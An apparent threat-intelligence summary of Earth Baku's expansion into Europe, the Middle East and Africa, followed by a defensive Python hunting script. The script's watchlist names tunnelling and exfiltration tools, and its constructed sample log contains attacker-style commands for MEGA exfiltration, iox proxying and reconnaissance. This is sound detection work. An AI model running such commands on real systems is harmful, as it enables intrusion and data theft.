China-Backed Earth Baku Expands Cyber Attacks to Europe, Middle East, and Africa

August 14, 2024 at 02:03AM

Earth Baku, a China-backed threat actor, has expanded its targeting to Europe, the Middle East, and Africa, including countries such as Italy, Germany, the U.A.E., and Qatar. The group has updated its tradecraft, using public-facing applications as entry points and deploying sophisticated malware once inside. Its intrusions rely on a range of post-exploitation tools and on cloud storage for data exfiltration.

Key takeaways from the article:

– The China-backed threat actor Earth Baku has expanded its targeting beyond the Indo-Pacific region to include Europe, the Middle East, and Africa since late 2022.
– Newly targeted countries include Italy, Germany, the U.A.E., and Qatar, with suspected attacks in Georgia and Romania.
– Sectors singled out include governments, media and communications, telecoms, technology, healthcare, and education.
– The group has updated its tactics, techniques, and procedures (TTPs) in recent campaigns, using public-facing applications such as IIS servers as entry points and deploying sophisticated malware toolsets inside the victim’s environment.
– Trend Micro researchers identified the group’s use of the DodgeBox loader (aka DUSTPAN) and the MoonWalk backdoor (aka DUSTTRAP), which Trend Micro tracks as StealthReacher and SneakCross respectively.
– Earth Baku is associated with APT41 and is known for its use of the StealthVector loader and post-exploitation tools such as the iox and Rakshasa tunnelling utilities and the Tailscale mesh VPN service for remote access.
– Data is exfiltrated with MEGAcmd, MEGA’s official command-line client, to the MEGA cloud storage service.
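The TTPs listed above translate directly into host-level hunting logic: an IIS worker process spawning a command shell (the footprint of a web shell on a compromised public-facing server), followed by execution of tunnelling tools, a mesh VPN client, or the MEGA command-line client. The script below is an added example written for this summary, not code from Trend Micro or from the report; it runs two such rules over a handful of constructed Sysmon-style process-creation events. The parent-process relationship (w3wp.exe spawning cmd.exe) and the binary names on the watchlist are assumptions of the example, since operators frequently rename their tooling.

```python
"""Hunt for Earth Baku-style post-exploitation activity in process-creation logs.

Added example, not Trend Micro's code. Events are constructed; the watchlist of
binary names and the w3wp.exe parent-process heuristic are assumptions.
"""
import json
import re
from dataclasses import dataclass

# IIS worker process. A web shell dropped through a vulnerable IIS-hosted
# application runs as a child of it, so w3wp.exe launching a shell is a strong
# signal. (Assumption of this example, not a detail from the report.)
IIS_WORKER = "w3wp.exe"
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Watchlist of the tooling the report names. Binary names are assumptions:
# MEGAcmd ships several executables (MEGAclient.exe on Windows, mega-put and
# friends on Linux), and iox/Rakshasa are often renamed by operators.
TOOL_RULES = {
    "MEGAcmd exfil": re.compile(r"^(megacmd\w*|mega-\w+|MEGAclient)(\.exe)?$", re.I),
    "iox tunnel": re.compile(r"^iox(\.exe)?$", re.I),
    "Rakshasa tunnel": re.compile(r"^rakshasa(\.exe)?$", re.I),
    "Tailscale VPN": re.compile(r"^tailscaled?(\.exe)?$", re.I),
}


def basename(path: str) -> str:
    """Last path component, handling both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    image: str
    parent: str
    cmdline: str


def check_event(event: dict) -> list[Finding]:
    """Apply both rules to one process-creation event (Sysmon EID 1-like fields)."""
    image = basename(event["Image"])
    parent = basename(event["ParentImage"])
    found = []
    # Rule 1: IIS worker process spawning an interactive shell.
    if parent.lower() == IIS_WORKER and image.lower() in SHELLS:
        found.append(Finding(event["Host"], "IIS worker spawned shell",
                             image, parent, event["CommandLine"]))
    # Rule 2: execution of a watchlisted tunnelling / VPN / exfiltration binary.
    for rule, pattern in TOOL_RULES.items():
        if pattern.match(image):
            found.append(Finding(event["Host"], rule, image, parent, event["CommandLine"]))
    return found


def hunt(lines) -> list[Finding]:
    """Run the rules over newline-delimited JSON events, skipping blank lines."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            findings.extend(check_event(json.loads(line)))
    return findings


# Constructed sample log: one web server showing the full chain, one workstation.
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"Host": "srv-web-01", "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": 'w3wp.exe -ap "DefaultAppPool"'},
    {"Host": "srv-web-01", "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Host": "srv-web-01", "Image": r"C:\ProgramData\mega\MEGAclient.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"MEGAclient.exe put C:\Windows\Temp\st.7z /backup"},
    {"Host": "srv-web-01", "Image": r"C:\Windows\Temp\iox.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "iox.exe proxy -l 1080"},
    {"Host": "ws-dev-07", "Image": r"C:\Program Files\Tailscale\tailscale.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "tailscale.exe up"},
    {"Host": "ws-dev-07", "Image": r"C:\Program Files\Google\Chrome\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "chrome.exe"},
])


def run_sample() -> list[Finding]:
    return hunt(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.host:<12} {f.rule:<26} {f.parent} -> {f.image}: {f.cmdline}")
```

The Tailscale rule is deliberately the noisiest: in an organisation that uses Tailscale legitimately it should be scoped to servers or to hosts outside an allowlist, whereas a VPN client or MEGA client appearing on an internet-facing IIS server in the wake of a w3wp.exe-spawned shell is rarely benign.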

For defenders, the notable points are the initial foothold on internet-facing IIS servers and the reliance on legitimate services (Tailscale for remote access, MEGA for exfiltration) whose traffic can blend in with normal use; process, tunnel and cloud-storage telemetry on public-facing servers is where these TTPs are most visible.